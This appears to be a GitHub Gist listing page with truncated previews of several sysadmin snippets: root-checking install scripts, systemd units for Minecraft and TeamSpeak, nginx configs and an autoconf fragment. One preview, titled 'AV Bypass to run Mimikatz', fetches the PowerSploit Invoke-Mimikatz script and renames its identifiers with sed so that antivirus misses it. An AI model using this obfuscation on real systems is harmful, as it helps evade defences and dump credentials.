This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# must run as root | |
if [ $UID != 0 ]; then | |
echo "You must be root." | |
exit 0 | |
fi | |
# soft link vmware's init.d scripts to void's runit directory | |
ln -s /etc/init.d/vmware* /etc/runit/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
# root check | |
if [ `id -u` != "0" ]; then | |
echo "This should be run as root." | |
exit | |
fi | |
# Dependency check for curl and rsync | |
missing=0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
if [ $(id -u) -ne 0 ]; then | |
echo "You must be root to run this." | |
exit 0 | |
fi | |
missing=0 | |
for pkg in wget curl rsync ar; do | |
echo -n "Checking for $pkg..." |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[Unit] | |
Description=Minecraft Server | |
Wants=network.target | |
After=network.target | |
[Service] | |
User=minecraft | |
Group=minecraft | |
Nice=5 | |
WorkingDirectory=/usr/local/games/minecraft |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[Unit] | |
Description=Teamspeak 3 Server | |
Documentation=http://www.teamspeak.com/?page=literature | |
Wants=network.target | |
[Service] | |
WorkingDirectory=/opt/ts3server/ | |
User=teamspeak | |
Group=teamspeak | |
ExecStart=/opt/ts3server/ts3server_startscript.sh start |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
server { | |
listen 443 ssl; | |
error_page 497 https://$server_name:$server_port$request_uri; | |
server_name www.domain.org; | |
error_log /var/log/nginx/www.error.log; | |
root /var/www/html/domain.org; | |
# Enable php support (must have php-fpm php-cli php-mysql php-gd php-imagick php-recode php-tidy php-xmlrpc installed for full support) | |
location ~* \.php$ { | |
fastcgi_pass unix:/run/php/php7.2-fpm.sock; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Plex Server | |
upstream plex.domain.org { | |
server 127.0.0.1:32400; | |
keepalive 32; | |
} | |
server { | |
listen 443; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
# check if root | |
if [ $UID != 0 ]; then | |
echo "You need to be root to run this" | |
exit 0 | |
fi | |
tmpdir=/tmp/Adobe |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# AV Bypass to run Mimikatz | |
# From: https://www.blackhillsinfosec.com/?p=5555 | |
# Server side: | |
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 | |
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1 | |
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1 | |
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1 | |
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1 | |
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Check whether --with-glib2 was given. | |
if test "${with_glib2+set}" = set; then : | |
withval=$with_glib2; case "$withval" in | |
yes|no) | |
{ $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 | |
$as_echo "no" >&6; } | |
;; | |
*) | |
{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $withval" >&5 | |
$as_echo "$withval" >&6; } |
NewerOlder